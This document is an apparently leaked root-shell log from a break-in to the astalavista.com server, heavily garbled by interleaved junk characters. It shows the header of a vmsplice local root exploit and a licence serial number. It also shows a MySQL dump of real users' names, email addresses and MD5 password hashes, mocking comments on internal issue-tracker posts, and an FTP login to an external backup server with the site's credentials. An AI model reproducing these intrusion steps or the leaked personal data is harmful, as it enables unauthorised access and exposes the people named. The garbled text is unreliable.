drwxr-xr-x 14 root root 4096 Mar 11 17:56 ..5 _4 e% J( `. u1 A+ g1 p
drwx—— 2 com com 4096 Jun 4 04:04 backups* @$ U. ?& V" Y1 Y2 U
-rw-r–r– 1 root root 2419504 Sep 28 2007 backup.sql+ F3 U$ U. _. s* o) T( J" J; O
drwxr-xr-x 2 com com 4096 May 12 15:20 backup_system0 S1 {2 {1 _7 Z8 v3 P
-rw——- 1 com com 21880 Jun 2 08:07 .bash_history
# e9 m- w S# X/ d) ]4 E-rw-r–r– 1 com com 24 Sep 24 2007 .bash_logout, } S& C, V- z* Y) w
-rw-r–r– 1 com com 176 Sep 24 2007 .bash_profile
" V: ` a( n5 j* T7 r. D6 N4 f7 M$ \-rw-r–r– 1 com com 124 Sep 24 2007 .bashrc. f+ s+ a% Q# E
drwx–x–x 3 com com 4096 Jan 29 2008 domains
3 H7 [5 p) Z( s! S-rw-r–r– 1 com com 16409 Jul 16 2008 FWUser.class.php.fixed
: D4 N( w, s! J7 i3 M$ Q: S, m# ?/ {drwxrwx— 3 com mail 4096 Jan 6 19:24 imap
7 G, A( R5 T7 E7 Z- i% y4 X-rw——- 1 com com 69 Nov 18 2008 .lesshst
0 N+ @/ I# S: m* Mdrwx—— 2 com com 4096 Sep 24 2007 mail
5 c$ i" k( `: \, z! C; p-rw——- 1 com com 13970 Mar 28 21:42 .mysql_history! \9 r; r+ R1 Z; ~! h- P2 O# l9 H
drwxr-xr-x 2 com com 4096 Aug 20 2008 .ncftp" u9 e1 k- s( a$ U; o
lrwxrwxrwx 1 com com 37 Sep 24 2007 public_html -> ./domains/astalavista.com/public_html
3 v7 R/ ]0 d* T- d# K- d" J-rw-r—– 1 com mail 34 Sep 24 2007 .shadow; k X% w j! Q1 w' B2 Y
drwx—— 2 com com 4096 Aug 26 2008 .ssh0 m5 h. s; Q/ _6 v- v
-rwx—— 1 com com 8515 Feb 10 2008 t
; l0 s+ ~2 X. ~8 n-rw-rw-r– 1 com com 6265 Feb 11 2008 t.c' F3 T, m" ~/ \
drwxrwxr-x 2 com com 4096 Jan 30 15:47 tmp/ Z$ `" [5 i" M
-rw-rw-r– 1 com com 617 May 20 2008 .toprc! J- T0 t* ?9 E% \# _2 X+ U: V) w
-rw-rw-r– 1 com com 141851766 May 19 2008 version2-backup-20080519-0900.sql! j; P0 t( t& D8 X, _& A, e
-rw——- 1 com com 16629 Mar 28 21:46 .viminfo# g% p& J& U" p6 ^( n
-rw-rw-r– 1 com com 51 Aug 25 2008 .vimrc
* Y* }8 K3 t8 i- k' s4 C& w( v# P$ A$ H" v
sh-3.2# head t.c
4 p8 V. o( M1 A/*9 l7 c! ?- h e) u; N0 a( G# c
* jessica_biel_naked_in_my_bed.c( u3 U9 ]3 J" h0 e8 G1 \/ s
*6 h5 E% ~* D% u1 G$ q& s% E0 }
* Dovalim z knajpy a cumim ze Wojta zas nema co robit, kura.% X! D# P+ E9 F4 S1 l( y. \# E
* Gizdi, tutaj mate cosyk na hrani, kym aj totok vykeca.
4 ?. I8 p- w0 d0 K) @* Stejnak je to stare jak cyp a aj jakesyk rozbite.
: H. C8 Y; b- k3 p( A) z% q*# V8 D7 ?# C1 g# X; z2 A* l3 K
* Linux vmsplice Local Root Exploit. Q4 |+ C" j; M* I
* By qaaz
2 ~5 T9 f5 x+ ~* L9 A*( H4 Z* t5 r. ^( w2 u! ~
6 `: y% h4 L+ w- G3 Y/ I2 F1 rsh-3.2# cd /" H b6 X L' ]* U- z1 q
sh-3.2# ls -la
0 w& L# n) O; G7 T/ D! q) ototal 360
0 j0 W2 e+ `3 Mdrwxr-xr-x 25 root root 4096 Jun 3 02:43 .1 M, l% d* x$ M2 l
drwxr-xr-x 25 root root 4096 Jun 3 02:43 ..6 L8 N( l2 c- C6 X9 V
-rw——- 1 root root 10240 Jun 3 02:39 aquota.group6 _/ k: Y+ g* a' n* k# l/ [
-rw——- 1 root root 10240 Jun 3 02:39 aquota.user' a5 W. }' G1 K' [ z
-rw-r—– 1 root root 819 Jul 17 2008 astalavista.us.db
! E) a" S$ O+ @* a& K R5 M-rw-r–r– 1 root root 0 Jun 3 02:43 .autofsck
7 v4 O2 x) y6 `8 F: B* ~7 Y-rw-r–r– 1 root root 0 Sep 16 2007 .autorelabel
2 J0 [2 L$ P1 g Y+ }drwxr-xr-x 3 root root 4096 Dec 29 2007 backup
$ u/ B u1 z* l. ~ R" y5 w5 Gdrwxr-xr-x 2 root root 4096 Jun 4 04:03 bin. D' I4 X) _5 x4 N% a9 J
drwxr-xr-x 5 root root 4096 Jun 2 14:06 boot
' V4 _; q3 D ?+ x, L& Q6 s4 X3 rdrwxr-xr-x 11 root root 3620 Jun 3 02:43 dev
4 K+ D d) K" M; ?& w7 edrwxr-xr-x 84 root root 12288 Jun 4 03:16 etc, z3 v T, n3 x& b1 O( X
drwxr-xr-x 14 root root 4096 Mar 11 17:56 home
, K& r) q" Y) l+ A( a-rw-r–r– 1 root root 13387 Mar 20 2008 httpd.conf5 x& f8 q& e. E: R2 n4 a
drwxr-xr-x 11 root root 4096 Jun 4 04:02 lib! G3 R/ G% w. |& Y. o; f5 L' G1 S
drwxr-xr-x 7 root root 4096 Jun 4 04:03 lib643 P$ T/ I' Q2 e8 z
drwx—— 2 root root 16384 Sep 11 2007 lost+found" ]9 Z6 y3 l+ {, |
drwxr-xr-x 2 root root 4096 Mar 11 17:56 media, W) J; z% D% y. `7 j5 N+ m& Z
drwxr-xr-x 2 root root 0 Jun 3 02:43 misc
( I, @- \- r- P3 z8 O& T( d2 pdrwxr-xr-x 2 root root 4096 Mar 11 17:56 mnt
3 {# p" A8 C' ~+ R% i* f-rw-r–r– 1 root root 5859 Feb 3 2008 mrtg.cfg4 L7 U( `5 w& a1 W6 c
drwxr-xr-x 2 root root 0 Jun 3 02:43 net
, Z' o7 p) F: S3 o; K% Zdrwxr-xr-x 3 root root 4096 Mar 11 17:56 opt
: |0 _( E1 a$ Idr-xr-xr-x 264 root root 0 Jun 3 02:42 proc
; t* j( m8 g3 t9 a8 A* D1 A9 `drwxr-x— 15 root root 4096 Jun 4 08:40 root
* w; T7 G( \; M4 F3 n- e9 n# Rdrwxr-xr-x 2 root root 12288 Jun 4 04:03 sbin
. H6 P$ t" b# [; s5 a/ `; Gdrwxr-xr-x 2 root root 4096 Mar 11 17:56 selinux1 c) r' ?) [! H/ N4 }# U* K
drwxr-xr-x 2 root root 4096 Mar 11 17:56 srv
8 a1 n% Y0 }2 ]2 l2 Pdrwxr-xr-x 11 root root 0 Jun 3 02:42 sys7 \% j z4 H, b* G/ W* n: f8 T, E
drwxrwxrwt 4 root root 122880 Jun 4 10:35 tmp$ Y0 B4 z5 \/ M3 h
drwxr-xr-x 16 root root 4096 Jun 2 13:56 usr& c: ?1 W5 S3 `/ }
drwxr-xr-x 26 root root 4096 Jun 4 03:16 var
9 X" k2 @( Z& K0 E, H& @# c6 V7 M" x. N2 c8 N7 C: u' x( R
sh-3.2# cd opt/ f" {) L3 |, @# i- q* W( I
sh-3.2# ls -la o, M+ ~: W) W
total 20
4 O5 l7 _2 [6 E/ _0 u" `2 Hdrwxr-xr-x 3 root root 4096 Mar 11 17:56 .
: p% v9 n5 \. N! Kdrwxr-xr-x 25 root root 4096 Jun 3 02:43 ..
+ k, P" Y2 h4 n" p7 tdrwxr-xr-x 15 root root 4096 Mar 20 2008 lsws. e1 `0 d" A8 }. }+ O: }0 o
! E' s8 b V" V$ p
sh-3.2# cd lsws/9 ?3 }9 p. p# }) \2 h9 L, W
sh-3.2# ls -la
# M$ z5 [; e F2 |4 i& b5 u& Etotal 108
3 o& ^* y* j! l$ V- } Vdrwxr-xr-x 15 root root 4096 Mar 20 2008 .! J& y1 o- v' T8 ]& t
drwxr-xr-x 3 root root 4096 Mar 11 17:56 ..
. C. [* s9 W8 d adrwxr-xr-x 8 root root 4096 Mar 20 2008 add-ons9 A L( A- d( ?! Q$ M
drwxr-xr-x 13 root root 4096 May 29 15:10 admin1 Q0 I+ g; m! y/ ]9 U7 n- ~
drwxr-xr-x 5 apache apache 4096 May 29 15:10 autoupdate
* h& u# E- T5 \$ Sdrwxr-xr-x 2 root root 4096 May 29 15:10 bin
9 _7 z) J6 R/ I# ?0 P% }drwx—— 4 apache apache 4096 Jun 3 02:43 conf
; ?2 ^+ _) Z- W) t& z7 A7 Fdrwxr-xr-x 7 apache apache 4096 Mar 20 2008 DEFAULT! \& b* w- Q% v+ U4 u
drwxr-xr-x 2 root root 4096 Sep 15 2008 docs
( V0 X+ S/ G) J/ A! R! U. ndrwxr-xr-x 2 root root 4096 May 29 15:10 fcgi-bin
+ Q- z! f/ g+ X {drwxr-xr-x 2 root root 4096 Sep 15 2008 lib3 e0 Z6 z# M# X# D! E$ I2 ^
-rw-r–r– 1 root root 6959 May 29 15:10 LICENSE
" y2 P6 Q2 q# N5 }. ^8 J% P-rw-r–r– 1 root root 2214 May 29 15:10 LICENSE.OpenLDAP
- v- [; [ c9 z5 M1 |! v4 B-rw-r–r– 1 root root 6279 May 29 15:10 LICENSE.OpenSSL
4 x0 z0 l9 J8 ^0 @" H-rw-r–r– 1 root root 3208 May 29 15:10 LICENSE.PHP
$ m5 B l9 S0 |, _drwxr-xr-x 2 root root 20480 Jun 4 09:55 logs
( ~' h! j5 g2 D1 gdrwxr-xr-x 2 root root 4096 Mar 20 2008 php8 b( n. h% S2 ]$ K& n) @
drwx—— 2 apache apache 4096 Mar 20 2008 phpbuild
c- A4 B. z/ u) L' Y0 _, b+ V7 c9 fdrwxr-xr-x 3 root root 4096 Mar 20 2008 share, T# v* E+ b# `6 L& {5 W w# ~
-rw-r–r– 1 root root 6 May 29 15:10 VERSION
- p! `( e# `! q, O0 F/ |9 l
c' K5 h( N. a# N3 ]! M# ]sh-3.2# cd conf1 P1 Q1 ~- R$ V: j9 A. _ Q
sh-3.2# ls -la
5 o& j5 m5 g# K t8 q" _$ N1 K& Itotal 48
3 Y* c% c( E& M1 ?% M+ Q, [( Odrwx—— 4 apache apache 4096 Jun 3 02:43 .
3 M0 o8 }. r0 m [drwxr-xr-x 15 root root 4096 Mar 20 2008 ..
9 f! I0 e( }* R0 y" A7 Xdrwx—— 2 apache apache 4096 Mar 20 2008 cert
# |: ~9 p& ~2 F6 F; i( C-rw-r–r– 1 apache apache 6668 May 29 15:13 httpd_config.xml) K) m* U$ ]7 x& N0 x5 k
-rw——- 1 apache apache 6613 May 27 18:33 httpd_config.xml.bak" T) P5 h {% H; k
-rw-r–r– 1 root apache 0 Jun 3 14:11 .last+ ^& r# e$ M# l# }9 H. o t' h9 E
-rw——- 1 apache apache 256 May 29 15:10 license.key/ A+ S: {3 k5 P5 _. ?/ i6 S) J
-rw——- 1 apache apache 256 Mar 21 2008 license.key.old& Y6 g1 d& i: ]1 u9 {+ w4 }1 ^
-rw——- 1 apache apache 3320 Mar 20 2008 mime.properties
4 U: ]/ i& U& w' A# Z. }5 l b7 K-rw——- 1 apache apache 20 May 29 15:10 serial.no
5 f: L5 a0 o8 cdrwx—— 2 apache apache 4096 Mar 20 2008 templates- U: j: a+ V' q5 r
0 s; B8 [: ]- B) B7 |) ^" ^" u
sh-3.2# cat serial.no
) U3 b# W! q% JIbDl-oVsO-CKqL-wVRa
/ ]# a3 s* q+ c3 o& h0 U; A5 C1 ^/ G2 K% C6 O4 E4 e' A4 P, G
sh-3.2# mysql
( \4 G) k. Z! ~+ H, s9 b2 ZWelcome to the MySQL monitor. Commands end with ; or \g.
y/ z- F5 }1 a ~7 t* v* X, { tYour MySQL connection id is 286844
H% L7 K' T4 ^& l; F5 Z0 rServer version: 5.0.45-community-log MySQL Community Edition (GPL)1 M( D, Y5 _& R& l1 {% k7 Y
3 B1 t1 i6 E. x, Y* ?Type ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the buffer.
+ p D" y1 S7 J9 f/ t% y4 k
0 ?! p+ q, A$ ^) L7 I/ Umysql> show databases;$ c5 k4 y. A$ n% @. Y! t
+———————–+$ B; T" c6 w' _/ a: x6 k/ M
| Database |
; ?, l0 Q3 V( {7 s& M5 |+ ~) R# S+———————–+' E: }6 z* z: p" O4 e
| information_schema |
" p9 S! h- A4 ?2 F9 s) B3 b( S6 _| astanet_ads |9 k+ _ l" c* p
| astanet_mailing_lists |! E. E& X3 q S% y( m4 J
| astanet_mediawiki |
" d2 l6 j# x% c4 S' L7 r7 W| astanet_membersystem |$ h0 d4 {6 \5 A
| com_contrexx |
; s" l+ [7 u* ]2 x e| com_contrexx2 |# C7 x0 \1 _0 f* u2 ~+ Z9 g" w- S
| com_contrexx2_live |
# I3 e+ ]& U) ?* z: {7 c| da_roundcube |; r9 S# r6 k5 f( x1 y
| dolphin |
7 G( ?/ m; ^' f K; j: ]+ k7 ?| ideapool |: Y) m( X* m# X
| mysql |
. p3 w2 \7 A" d| test |
; \2 _) Q% D2 P' }+ I4 f; l) E| yourmaster |
4 Q5 `; m( k6 H: g0 t1 n+———————–+. X0 ^2 `. Z, ^# _6 L8 @# @1 S
14 rows in set (0.00 sec)
( P0 z6 q0 U2 r3 M
% e; w8 y4 O% _# [mysql> use ideapool
, _! j* h5 d4 o6 w g- I% p" pDatabase changed
; M+ K: S$ o% W& ~# e2 zmysql> show tables;! E: n8 C$ i, A+ F) A% `
+———————————–+3 w7 s0 J8 {4 I
| Tables_in_ideapool |
- l2 W, }6 E; _1 p- O4 t; H/ m+———————————–+
7 b, R# {5 }1 ]+ I+ S1 || eventum_columns_to_display |
) |$ z1 H1 l8 }0 R2 d: N| eventum_custom_field |
* i) s0 Z' F4 T3 w6 n+ i- ]* i| eventum_custom_field_option |+ ~, f" F6 l4 ^1 W* L$ ^
| eventum_custom_filter |
/ o+ O+ n8 ^8 ]! J9 r| eventum_customer_account_manager |
! j- K4 `- m# T* w2 V| eventum_customer_note |
" d- ~5 Z. s V* Q, W| eventum_email_account |
3 P$ s M% M: @' V$ A; o* J| eventum_email_draft |8 r3 b* i; F j" d2 w- c
| eventum_email_draft_recipient |6 B* Q- N0 w. ~2 g' f3 Z& t
| eventum_email_response |/ J1 d! ? \' F3 R& W
| eventum_faq |( n. w* r6 P1 [# @' M0 L$ o9 w
| eventum_faq_support_level |
A" h4 X' s3 g' r6 k| eventum_group |9 o4 N$ d n4 z# b9 S; J2 F
| eventum_history_type |& |3 h* K& f9 T8 G' q9 e3 `9 M y
| eventum_irc_notice |+ A# I9 ?# F( K X9 Z
| eventum_issue |/ n! ?+ x! G$ [0 h: t4 J
| eventum_issue_association |( R& f( m; n F
| eventum_issue_attachment |! o2 R( b' x. ?& t/ G- r/ \
| eventum_issue_attachment_file |& b% X6 f7 t% g
| eventum_issue_checkin |
$ u( D. l7 \0 m( ^& U& o/ p| eventum_issue_custom_field |
! {# u0 G; s8 A: i; I& K* Y8 W8 l! Z| eventum_issue_history |
3 ~9 x7 g- C9 e5 y$ f( U0 f' @| eventum_issue_quarantine |2 I- ?2 f& U$ x. C) c# o
| eventum_issue_requirement |* n0 {: ]0 u4 X
| eventum_issue_user |
- \3 h8 a+ C* ~$ A1 x| eventum_issue_user_replier |+ X- O, f! t" y3 d$ z- `6 \3 k/ o
| eventum_link_filter |
6 ]) x/ k' W7 P' }5 z) U7 t| eventum_mail_queue |2 ~1 w* w* f, @: w
| eventum_mail_queue_log |+ V& ]- z: s, P h
| eventum_news |/ i& c2 m5 a- G! F- R0 A% Y
| eventum_note |3 j& J- ]( R8 k( d5 S- i
| eventum_phone_support |
# y( p$ ]$ \/ V H| eventum_project |
$ q+ j' u3 l, k0 U' U| eventum_project_category |
. E' ^/ g) D8 s7 X3 P b| eventum_project_custom_field |
) R/ {1 E2 a. C' E& e. O7 ^| eventum_project_email_response |1 e) i: c& U% N6 f9 s/ Z
| eventum_project_field_display |5 i. b# i' K: j$ \
| eventum_project_group |
: Z, b3 f9 \. Q J) d @+ H| eventum_project_link_filter |
3 Z! S# k, X4 C' H0 I+ n/ T| eventum_project_news |
$ `: j: C( r; C% Y2 j; i$ J/ h| eventum_project_phone_category |
% b) [2 Y( _; W7 P/ z' X| eventum_project_priority |
8 z4 h$ r A3 q+ O, X) K9 N/ M| eventum_project_release |- P. F) }' v a8 y1 j; _
| eventum_project_round_robin |
9 K4 t1 X) m8 O$ F0 Q| eventum_project_status |. C) G7 N u6 }- T
| eventum_project_status_date |
/ r9 v* E+ j2 O. V| eventum_project_user |: a$ R) r7 I( i1 T" V$ \
| eventum_reminder_action |$ w: M9 @$ ^7 f3 c
| eventum_reminder_action_list |
w- W0 r- f0 o# S0 Z| eventum_reminder_action_type |3 P* p+ P, h3 _- V4 t
| eventum_reminder_field |
* A1 Z3 c: J, |1 a" N| eventum_reminder_history |
: r; Y4 B: R2 M2 z| eventum_reminder_level |
4 y" }+ m" l- S, l9 R| eventum_reminder_level_condition |: z) b2 E9 a$ U0 U0 R* P' G: q$ ^
| eventum_reminder_operator |( J W! J' H# z, M& T4 d1 ]' Z O
| eventum_reminder_priority |$ X% U# v6 B0 }5 x1 B
| eventum_reminder_requirement |9 K- ]6 j S0 Z$ Z
| eventum_reminder_triggered_action |
( r3 s7 y% x7 i9 t| eventum_resolution |: l' f; Q: e' `8 Q2 \# Z5 Y
| eventum_round_robin_user |% z. _" R4 j" f/ m" t
| eventum_search_profile |
; }3 v. \8 t7 k# B5 T3 b; W; O$ G- G| eventum_status |
+ {) i2 l7 O" p% h| eventum_subscription |" [6 g! F( g$ V
| eventum_subscription_type |2 u5 @9 K+ S/ U. M
| eventum_support_email |
% L, \) O. L' F$ i| eventum_support_email_body |, _ e7 c. } S( Q" E- E. ^+ \+ e2 x
| eventum_time_tracking |8 T5 D) J7 ~. f, p1 U8 G
| eventum_time_tracking_category |
! [1 n# F% W/ k' H7 `1 g| eventum_user |- h/ {! O* f4 {7 l: n
+———————————–+
2 B$ U1 E K! m2 ]69 rows in set (0.00 sec)
) V# p4 K' d: p) O( I/ Z0 ~
, U Y* _6 m( Gmysql> describe eventum_user;
p6 a, x: t: N% a3 I+————————-+——————+——+—–+———————+—————-+
: t; w& Q v3 W9 X8 ^7 z1 J2 A| Field | Type | Null | Key | Default | Extra |
. h* G. d# s& l' g- L+————————-+——————+——+—–+———————+—————-+
- }9 K, o& N6 g9 o; g( H# l9 ^( X| usr_id | int(11) unsigned | NO | PRI | NULL | auto_increment |1 S+ L; i8 f3 ^& h) C- a* n
| usr_grp_id | int(11) unsigned | YES | MUL | NULL | |8 {1 g, `0 P H) ?- [" r' l
| usr_customer_id | int(11) unsigned | YES | | NULL | |* ?8 b3 o1 p( O- n/ a
| usr_customer_contact_id | int(11) unsigned | YES | | NULL | |
. Q6 H* O+ b7 c; z+ G+ b| usr_created_date | datetime | NO | | 0000-00-00 00:00:00 | |
/ |& A& x1 M9 D9 f| usr_status | varchar(8) | NO | | active | |
( U' U% U* |# c3 Z4 H( a1 q| usr_password | varchar(32) | NO | | | |
1 T5 D2 y! U& |9 M| usr_full_name | varchar(255) | NO | | | |
/ Y7 g$ K" W# `' f$ |+ U5 p| usr_email | varchar(255) | NO | UNI | | |
3 D9 E: _- @1 v% z# u| usr_preferences | longtext | YES | | NULL | |
9 P& U% I' B! l' ] n| usr_sms_email | varchar(255) | YES | | NULL | |
( o' ]: C% x) Y4 k1 }9 i$ I| usr_clocked_in | tinyint(1) | YES | | 0 | | S: ?- G2 ?5 N* |/ k( i
| usr_lang | varchar(5) | YES | | NULL | |0 H; d* n6 r3 C3 n; Q
+————————-+——————+——+—–+———————+—————-+0 J7 ^* D3 r; L( @" Q" y
13 rows in set (0.00 sec)
4 k# h, M6 e" P* T V& |
) W( }* p6 V* j& tmysql> select usr_full_name,usr_email,usr_password from eventum_user;& _/ O ]( P* k2 [. U3 D7 |3 |
+———————-+——————————-+———————————-+
+ K% g; c# ~2 ]| usr_full_name | usr_email | usr_password |
u: y8 m& y) V3 H8 \+———————-+——————————-+———————————-+
# `1 ?* t) k2 a( @+ o8 l| system | 链接标记system-account@example.com | 14589714398751513457adf349173434 |$ M% N0 g; N/ s2 q' r6 G6 s
| Developer (Paulo) | 链接标记paulo.santos@astalavista.ch | 26a35a1cf8895c27fb37ef4cf149f7bb |9 r: L: B; g' j
| Be1er0ph0r | 链接标记be1er0ph0r@gmx.de | 229766dc0ca1fb67160a8782321dfdce |: i8 h4 E( T3 ^$ L. n# M
| Admin | 链接标记pascal.mittner@astalavista.ch | 57c2877c1d84c4b49f3289657deca65c |- r% ]" k8 ^5 G
| ADMIN | 链接标记admin@astalavista.ch | f6fdffe48c908deb0f4c3bd36c032e72 |9 e6 y& U, @' a
| USER | 链接标记user@astalavista.ch | 5cc32e366c87c4cb49e4309b75f57d64 |
/ z: u% b$ M/ z) ~7 S| Glafkos - (nowayout) | 链接标记glafkos@astalavista.com | f7735ab119023a8abb2301e67f81cd67 |
8 ]/ ?+ Y3 O* ]( V0 ~0 M* B+ X& || Joao | 链接标记joao.pontes@astalavista.net | f805c071d7c823b937448c54c047b9fd |
; ?) b- u7 G$ G; w: }: V7 F| Pascal | 链接标记pm@astalavista.ch | e10adc3949ba59abbe56e057f20f883e |! I4 \& Y' T) g8 {5 ]0 d6 P S
| commander | 链接标记commander@astalavista.com | 932cd250918f881d41feb0b93883a926 |/ z2 J9 D, n# u/ ]- O5 n, u
| ishtus | 链接标记ishtus@astalavista.com | a587ffc88b3dbbba3fd2fe67af649ff0 |
8 H' T' w) \ L2 C6 O| sykadul | 链接标记sykadul@astalavista.com | 20224a2f3eeb57a13a10b4df543c128e |4 \: k2 Y' f8 Z/ w# j" I
| Zach McElroy | 链接标记admin@badfoo.net | 33c5d4954da881814420f3ba39772644 |( N( W% G; E% I
| usb | 链接标记usbenigma@hushmail.com | b513f22c3db6932855ad732f5f8a10a2 |
9 R+ r5 c6 h5 A, n1 V _8 k| cyph3r | 链接标记cyph3r@astalavista.com | 6e1e50017a945e874d52ec91f9ab2cee |
: R" L' U' B7 m ?/ X+———————-+——————————-+———————————-+$ U. o2 Y5 D4 S
15 rows in set (0.00 sec)5 G( l! V/ ^" W( V( h( ?+ W
0 `2 K; e4 o& o+ F* Mmysql> select iss_description from eventum_issue where iss_id = 43;8 |0 C6 t8 E* u* S3 b. x
+————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————-+. I( y" y: V0 x/ e% d6 B1 I/ V
| iss_description % i$ F# {, {8 R* S! f9 R3 b
|
F2 n7 K+ E; m9 u5 ?+————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————-+
5 ~' \. \' y3 D, f4 s! M! c| Ok guys, to boost our traffic and revenue what we have to do is keep users logged in… how to do that? well think about it… if a user is watching a movie… he’ll be
0 i; h8 [4 }& T% iconnected for 90 mins… 120mins… so what i propose is something like:
, j6 h7 q" c+ p' D8 s链接标记[url]http://www.surfthechannel.com/[/url]
9 c' m* L) o3 G4 vsince they only provide LINKS to the movies they are LEGAL and don’t break DMCA rules… so we could do the same… “iframe” the content on our website or use a system
% K0 v' o5 q8 X" o, y; F/ W% e% rlike podcast that uses our own flash player to stream content from other places, therefore the content NOT BEING HOSTED ON OUR SERVERS but only viewed… which doesn’t
: P: ^, W# w2 D( ]) U6 S) j$ ibreak any laws as far as i am aware (we should research on that just to be sure though!) Of course we would have to provide users with the button to take the content off' u1 z0 ?9 @- K" M' |/ Q
if they think it breaks copyright laws and we will remove it… i think that makes it on the border of DMCA…
. }, V5 v* b0 \: S0 X+ j+ _8 z5 |1 Z% M+ C+ ^" w( x
We could also put advertisement during play on the flash video player itself… extra $$…
" ?0 e) r+ ]% l! D
8 n5 B' E4 ^2 K& \By sykadul |+ C4 ^4 S4 \6 }0 x: \% L9 @1 W
+————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————-+
8 N5 h# \3 q' ~* L1 row in set (0.00 sec)
' G* I: q- o) U+ C# C( @/ M
0 \2 @8 G) P" W9 U5 R6 t1 S _9 y// Money and extra $$ is all they care about. remember that.7 Y& A2 H$ Q$ G# z' x% n
% ~$ C& }# K6 }# \9 ?
mysql> select iss_summary,iss_description from eventum_issue where iss_id =42;% z. O: T% w, Z7 o# A
+————————+——————————————————————————————————————————————————————————————————————————————-+
" q0 Q) g1 p, E| iss_summary | iss_description
f3 _# U- Y# g9 Y8 e|. @% f" n* E. }( [1 _
+————————+——————————————————————————————————————————————————————————————————————————————-+& R' a3 ^3 c- N4 ]6 U9 @
| Forum for REAL EXPERTS | Hello,
" J; f- k! }% `- J! I# b: m. J4 [# v" N4 c. W) u
Ishtus and I,; q2 I- v, G2 P3 i7 {- a9 W
9 _! U- ^# N9 Q2 K9 e7 aCame up with a crazy and very workable and professional idea. We create an invitation only forum with the BEST security experts worldwide
; s I& ]2 R) o# y) i! l4 {ONLY. Security Experts from Bugtraq lists, exploit writters, reverse engineers etc..
, e: W: R ?9 | q; {# {% Q" z' O2 u$ c; U4 J! f# {- K
One example a friend of mine from coresecurity.com!% B/ l/ n/ Y! ~( u
0 v F( U1 j- a5 i1 DWe could have big projects etc.. and we can work all together to bring to the security community exploits, open source software etc..
4 o" k) a0 S4 p3 n8 [* Q; I3 y; M4 i( v$ k# W8 \
|
, R2 F; c* B0 L3 [; j% O4 I) T+————————+——————————————————————————————————————————————————————————————————————————————+, W/ I4 s' Y2 ~% B, ] r
1 row in set (0.00 sec); W# d* `/ s' P2 i% k6 }. h# K
, ?) H/ f* q' q. U5 D; ^% W4 f// What an awesome yet original idea Ishtus and him… bring MORE security “experts”, thats exactly what the world needs…$ e$ T$ @7 K# m, ?
6 H) o, s0 X5 m
mysql> select iss_summary,iss_description from eventum_issue where iss_id = 16;9 V p3 A1 ^6 q! U7 ]) G3 u
+——————+———————————————————————————————+
: ]; d# `1 C& u* a) E, K6 d| iss_summary | iss_description |
" ]2 m* H+ j- Q" }+——————+———————————————————————————————+
" e/ b4 E. f1 r6 S2 Y5 k$ d9 M| Website guidance | Virtual Girl which guides you trought the website.
7 Z4 W' C) a6 L0 V0 F3 }4 I# X: W. L* y" s: i4 e l3 Y% W Z) H/ }
We need a girl with who you can ( talk )!!!& {# k5 v" v; m3 s
Also for the News!
$ x+ t& U" o; \" ]So my suggestion is a girl who read you the news loud if you like!. | z( L s9 |/ a3 e
you can choose between read yourselfe or she read it for you or both!
) {' B: V! X" ~& R# @" S2 y' I' f+ I$ U) |7 s
Go to 链接标记[url]www.heise.de[/url]! There is an example for Voice News! It’s a good thing!!!
0 }. d) P9 C" `' O
. p4 F( F% b' ^! p2 I. p& pHave a look on the example girls!!
& v# A! w' E6 F, [+ W% p* {4 P, b
; ~5 @) l( T) U; ^: Y5 ]; u链接标记[url]http://www.yaoti.com/de/free_yaoti.html[/url]
% X( z! H$ g6 g/ i- B( O5 J
3 {. J; o' e; |) K/ Uor that
( p! _: v1 e! \6 P
6 V. v O% N0 W) N/ t; o6 j链接标记[url]http://www.yellostrom.de/[/url]& ?& I" g. r$ h5 L' s
6 Q6 R0 P' f3 c1 \2 S
|$ z; n& Z, b+ h5 ^4 { ]
+——————+———————————————————————————————+
8 I( w2 D+ J b. b1 row in set (0.00 sec)
( \7 H6 x# M: M: \+ Z
; r N4 ]3 m9 ^// ha ha.
; i. e( M& U/ A
4 G I4 o* t3 F* Q1 ^6 hmysql> select iss_summary,iss_description from eventum_issue where iss_id = 7;
. H# G0 b: U9 x8 q: S' l( B0 B/ [. N+————————–+———————————————————————————————————–+
9 t6 C& @6 c' h& |' [| iss_summary | iss_description |( p' ]$ N. e; }4 @) ?0 c8 Y' }& M
+————————–+———————————————————————————————————–+- K% v. o( i; W$ g- C. U( G$ o4 A
| Exploit Development Team | We need an exploit development team to focus on exploit research and publication under Astalavista name. |4 i5 E# H4 S9 E+ Z: j6 _
+————————–+———————————————————————————————————–+; d3 ^! K$ q- a' y; K
1 row in set (0.00 sec)/ @# b Q3 _; U/ M1 @; {& |
4 y/ K0 E) ]% E
// LOL.
3 f% N$ l: ]% x- [: {- N' v8 ], O- M, `, D
mysql> exit1 R' y& q8 p/ c5 b) t
Bye
% n! l! ?1 i/ z7 B' }% b) T1 w8 M" K5 P! }
sh-3.2# ftp 212.254.194.163; S/ s6 S2 V2 W& d% o1 ]3 t4 x
Connected to 212.254.194.163.
0 T8 Q1 u- h I5 |" P220 BackupCOM_VW FTP server ready.
+ ]0 ^- {) D8 g* T+ ?; n504 AUTH: security mechanism ‘GSSAPI’ not supported.
/ _0 N5 T1 Z( d" o504 AUTH: security mechanism ‘KERBEROS_V4′ not supported. Z; _3 x) |% \. p2 p
KERBEROS_V4 rejected as an authentication type% a/ F3 a4 y- p5 g
Name (212.254.194.163:root): astalavista.com
+ P% d! I4 g: t p7 S7 j$ @331 Password required for astalavista.com., l9 B+ q0 G7 T
Password:! M( V! ^7 Z% f" Y5 T
230 User astalavista.com logged in.+ X! W2 I Q7 ^( E1 {3 u6 z! }+ D
Remote system type is UNIX.4 w; m5 G& c t/ X
Using binary mode to transfer files.
* R) A2 l5 [& v7 N ]7 J' pftp> ls -la
% [! {. E% s, x6 B6 i# A3 z227 Entering Passive Mode (212,254,194,163,2,188)1 f" J& n0 h9 ^- g, p
150 Opening BINARY mode data connection for ‘file list’.
2 r8 F" ^' x; M! Y/ o$ Q" J$ kdr-x—— 1 root users 4096 Jun 4 06:13 astalavista.com' q. P+ F; ^$ F: Z' }7 q
226 Transfer complete.( M' G! p6 o* b/ _& z
ftp> cd astalavista.com
; T1 R: z5 O" g; m$ M9 e' u4 _* ]250 CWD command successful.
/ u5 J' u8 }0 q: oftp> ls -la
